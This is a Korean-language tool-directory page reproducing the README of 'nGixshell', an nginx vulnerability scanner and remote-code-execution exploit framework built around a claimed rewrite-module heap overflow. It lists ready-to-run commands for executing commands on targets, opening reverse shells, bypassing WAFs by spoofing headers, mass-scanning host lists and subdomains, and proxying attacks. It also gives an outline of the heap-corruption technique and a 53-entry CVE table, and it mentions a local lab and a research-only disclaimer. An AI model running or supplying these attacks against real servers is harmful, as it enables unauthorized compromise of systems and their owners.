Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
nGixshell — nginx CVE 스캐너 + RCE 익스플로잇 프레임워크 (CVE-2026-42945 + 기타 16개) | Kitploit
도구/GitHubGitHub/mateusverass/ngixshell
ReconnaissanceVulnerability ScannersExploit FrameworksWeb Application ExploitationWAF BypassWeb SecurityPenetration TestingCommand and ControlSubdomain EnumerationRed TeamingPayload Development
21863개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
mateusverass/ngixshell

nGixshell

nginx CVE 스캐너 + RCE 익스플로잇 프레임워크 (CVE-2026-42945 + 기타 16개)

저장소 보기
nGixShell

Python CVEs Zero deps License


nGixShell은 nginx CVE 스캐너이자 RCE 익스플로잇 프레임워크입니다. CVE-2026-42945 — ngx_http_rewrite_module의 치명적인 힙 버퍼 오버플로우 — 에 대한 작동하는 개념 증명과 53개의 nginx CVE를 자동 HTTP 프로브, 핑거프린팅, WAF 탐지/우회, 웹 보안 감사 및 보고서 생성을 통해 스캔하는 기능을 제공합니다.

외부 의존성 제로. 순수 Python 3 표준 라이브러리.


빠른 시작

root@kitploit:~
# 취약한 실습 환경 실행
docker compose -f env/docker-compose.yml up -d

# 자동 모드 — 핑거프린팅 + CVE 스캔 + 웹 감사
python3 ngixshell.py 127.0.0.1:19321

# RCE를 통한 명령 실행 (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# 리버스 셸 연결 (IP 자동 감지)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# WAF 탐지 및 우회 후 스캔
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# 서브도메인 스캔
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# 파일로부터 다중 대상 처리
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

플래그가 필요 없습니다 — 도구에 대상을 지정하면 모든 것이 자동으로 실행됩니다.
TLS는 자동 감지됩니다. nginx는 server_tokens off가 설정되어 있어도 핑거프린팅됩니다.


사용법

root@kitploit:~
python3 ngixshell.py [TARGET] [OPTIONS]

TARGET 형식:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

모드

WAF 탐지 및 우회

플래그설명
--waf-detect스캔 전 WAF 탐지
--waf-bypass모든 우회 기법 활성화 (탐지도 실행됨)
--waf-ip IP우회 헤더에서 이 IP 스푸핑 (기본값: 임의 RFC1918)

우회 기법 (--waf-bypass 설정 시 모두 활성화):

탐지되는 WAF: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

웹 감사

스캔 모드에서 자동으로 실행됩니다. 모든 모듈은 개별적으로 건너뛸 수 있습니다.

  • 헤더 감사 — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, 버전 누출 헤더
  • 경로 발견 — 50개 이상의 경로; 센티넬 프로브로 포괄적인 403/301 규칙에 의한 거짓 양성 제거
  • 가상 호스트 열거 — 상태 AND 본문 차이를 요구하여 기본 차단 거짓 양성 방지
  • TLS 감사 — TLS 1.0–1.3 지원, 인증서 만료, 자체 서명 탐지 테스트
  • stub_status — /nginx_status가 노출된 경우 활성 연결 메트릭 파싱

연결

플래그설명
--port PORT포트 재정의
--tlsTLS 강제 사용 (기본적으로 자동 감지)

HTTP

플래그설명
--user-agent UA사용자 정의 User-Agent
--auth USER:PASSHTTP 기본 인증
--cookie VALUE쿠키 헤더

비율 / 타이밍

플래그설명
--rate-limit RPS초당 최대 요청 수
--jitter MS요청 간 0–MS ms 무작위 지연
--retry N

출력

플래그설명
--output FILE로그를 FILE에 기록

CVE 적용 범위

2009~2026년까지 53개 항목. CVSS 기준 정렬.


버그 (CVE-2026-42945)

nginx의 rewrite 스크립트 엔진은 두 단계 모델을 사용합니다: 버퍼 크기 계산 후 복사. is_args 플래그는 rewrite 대체 문자열에 ?가 포함될 때 메인 엔진에 설정되지만, 길이 계산 단계는 새로 초기화된 서브 엔진에서 실행됩니다:

  • 길이 단계 — is_args = 0 → 원시 캡처 길이 반환
  • 복사 단계 — is_args = 1 → ngx_escape_uri(NGX_ESCAPE_ARGS) 호출, 안전하지 않은 각 바이트를 3바이트로 확장

복사는 공격자가 제어하는 URI 데이터로 크기가 부족한 힙 버퍼를 오버플로우시킵니다. 익스플로잇은 교차 요청 힙 펭 슈이를 통해 인접한 ngx_pool_t 정리 포인터를 손상시켜, 풀이 파괴될 때 system()을 호출하는 가짜 ngx_pool_cleanup_s로 리디렉션합니다.

영향을 받는 버전

제품취약한 버전수정된 버전
NGINX 오픈소스0.6.27 – 1.30.01.31.0, 1.30.1
NGINX PlusR32 – R36R36 P4, R35 P2, R32 P6

벤더 권고: https://my.f5.com/manage/s/article/K000160932


실습 환경 설정

Ubuntu 24.04 LTS에서 테스트됨. Docker 및 Python 3.8+ 필요.

root@kitploit:~
# 취약한 실습 환경 실행 (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# 전체 스캔
python3 ngixshell.py 127.0.0.1:19321

# JSON 출력과 함께 RCE
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# 리버스 셸 — bash 페이로드, PTY 자동 업그레이드
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# 스푸핑된 IP로 WAF 우회 스캔
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# SOCKS5 프록시를 통한 스캔
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# 레이트 리밋이 있는 서브도메인 스캔
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# 다중 대상, JSON 출력, HTML 보고서
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

면책 조항

승인된 보안 테스트, CTF 대회 및 연구 목적으로만 사용하십시오.

도구 다운로드
플래그설명
(없음)자동 — 핑거프린팅 + CVE 스캔 + 웹 감사
--cmd 'CMD'CVE-2026-42945 RCE를 통해 명령 실행
--cmd-file FILE파일에서 명령 실행 (;로 연결됨)
--shell리버스 셸 연결
--shell-type TYPE페이로드: bash python perl php nc powershell (기본값: python)
--upgrade-shell셸 연결 후 PTY 업그레이드 자동 전송
--subdomain-scan DOMAIN서브도메인에서 취약한 nginx 찾기
--cve CVE-ID특정 CVE 하나만 테스트
--list-cves53개 CVE 모두 CVSS 및 프로브 정보와 함께 출력
--list-candidates힙 주소 후보 출력
--dry-run핑거프린팅 + 스캔만, 익스플로잇 없음
--target-file FILE파일에서 여러 호스트 스캔
기법상세
IP 스푸핑X-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
UA 로테이션11개의 실제 브라우저/봇 User-Agent, 요청마다 무작위
경로 난독화이중 슬래시, /./ 패딩, 퍼센트 인코딩, 대소문자 변형
헤더 대소문자 셔플헤더 이름 대소문자를 무작위화하여 WAF 패턴 매칭 회피
플래그설명
--skip-headersHTTP 보안 헤더 감사 건너뛰기
--skip-paths경로/파일 발견 건너뛰기
--skip-vhosts가상 호스트 열거 건너뛰기
--skip-tlsTLS 프로토콜 감사 건너뛰기
--path-wordlist FILE추가로 탐색할 경로 (한 줄에 하나씩)
--proxy URL
프록시: http://, https://, socks5://
--header NAME:VALUE추가 헤더 (반복 가능)
불명확한 프로브 재시도 (기본값: 1)
--timeout-multiplier X모든 타임아웃 조정 (기본값: 1.0)
--json마지막에 JSON 요약 출력
--html-report [FILE]HTML 보고서 생성 (기본값: ngixshell_<host>_<ts>.html)
--verbose디버그 출력
CVECVSS구성 요소설명
CVE-2026-429459.8 심각rewrite힙 오버플로우 → RCE (익스플로잇)
CVE-2026-429468.1 높음rewrite메모리 손상 (동일 권고)
CVE-2022-417417.8 높음mp4악성 mp4를 통한 메모리 손상
CVE-2016-12477.8 높음패키징로그 파일 심볼릭 링크 권한 상승
CVE-2021-230177.7 높음resolver1바이트 차이 힙 덮어쓰기
CVE-2026-407017.5 높음request요청 처리 중 메모리 손상
CVE-2026-429347.5 높음request메모리 손상 (동일 권고)
CVE-2026-277847.5 높음mp4조작된 mp4를 통한 버퍼 오버플로우
CVE-2026-326477.5 높음mp4버퍼 오버플로우 (위 항목과 유사)
CVE-2024-249907.5 높음HTTP/3QUIC 모듈의 use-after-free
CVE-2024-249897.5 높음HTTP/3QUIC의 NULL 포인터 역참조
CVE-2024-310797.5 높음HTTP/3QUIC 인코더의 스택 오버플로우
CVE-2024-327607.5 높음HTTP/3HEADERS 프레임을 통한 버퍼 덮어쓰기
CVE-2022-417427.5 높음mp4힙 메모리 노출
CVE-2017-75297.5 높음range filter정수 오버플로우 → 범위 초과 읽기
CVE-2016-07467.5 높음resolver조작된 DNS 응답을 통한 use-after-free
CVE-2014-01337.5 높음SPDYSPDY 구현의 힙 오버플로우
CVE-2014-00887.5 높음SPDYSPDY의 메모리 손상
CVE-2013-45477.5 높음coreSpace+NUL URI 우회
CVE-2013-20287.5 높음core청크 인코딩 스택 오버플로우
CVE-2012-11807.5 높음proxy프록시 모듈의 use-after-free
CVE-2009-35557.5 높음SSLTLS 재협상 인젝션 (MITM)
CVE-2009-26297.5 높음coreURI 파싱의 버퍼 언더플로우
CVE-2026-429266.5 중간HTTP/2프록시를 통한 요청 분할
CVE-2026-276546.5 중간WebDAVDAV 모듈의 힙 오버플로우
CVE-2026-287536.5 중간mail메일 프록시의 헤더 인젝션
CVE-2026-16426.5 중간proxySSL 업스트림 세션 재사용 누출
CVE-2019-95116.5 중간HTTP/2Data Dribble CPU/메모리 DoS
CVE-2012-20896.8 중간mp4mp4 요청을 통한 버퍼 오버플로우
CVE-2018-168455.5 중간mp4정수 언더플로우 → 크래시 + 정보 노출
CVE-2019-203725.3 중간proxyHTTP 요청 밀반입
CVE-2026-404605.3 중간HTTP/3QUIC 연결 스푸핑
CVE-2026-287555.3 중간SSLOCSP 처리 중 메모리 노출
CVE-2025-234195.3 중간SSLTLS 세션 재개 인증서 우회
CVE-2024-352005.3 중간HTTP/3NULL 포인터 역참조
CVE-2024-341615.3 중간HTTP/3메모리 노출
CVE-2016-44505.3 중간core청크 요청 본문의 NULL 포인터
CVE-2016-07425.0 중간resolver조작된 UDP 패킷을 통한 잘못된 포인터
CVE-2016-07475.0 중간resolver불충분한 CNAME 해결 제한
CVE-2014-35565.0 중간mailSTARTTLS 명령 인젝션
CVE-2013-20705.3 중간proxy백엔드 응답 노출
CVE-2011-49635.0 중간accessIPv6 리터럴 접근 제어 우회
CVE-2011-43155.0 중간resolver조작된 DNS 응답을 통한 힙 오버플로우
CVE-2009-38965.0 중간coreNULL 포인터 역참조 DoS
CVE-2025-538594.3 중간mailSMTP 명령 인젝션
CVE-2014-36164.3 중간SSLTLS SNI 가상 호스트 혼동
CVE-2026-276514.3 중간mail메일 프록시의 NULL 포인터 역참조
CVE-2019-95134.3 중간HTTP/2Resource Loop CPU DoS
CVE-2019-95164.3 중간HTTP/20-길이 헤더 메모리 고갈
CVE-2018-168434.3 중간HTTP/2과도한 메모리 소비
CVE-2018-168444.3 중간HTTP/2SETTINGS 프레임을 통한 과도한 CPU
CVE-2024-73474.7 중간mp4범위 초과 읽기
CVE-2009-38984.9 중간WebDAVCOPY/MOVE를 통한 디렉토리 트래버설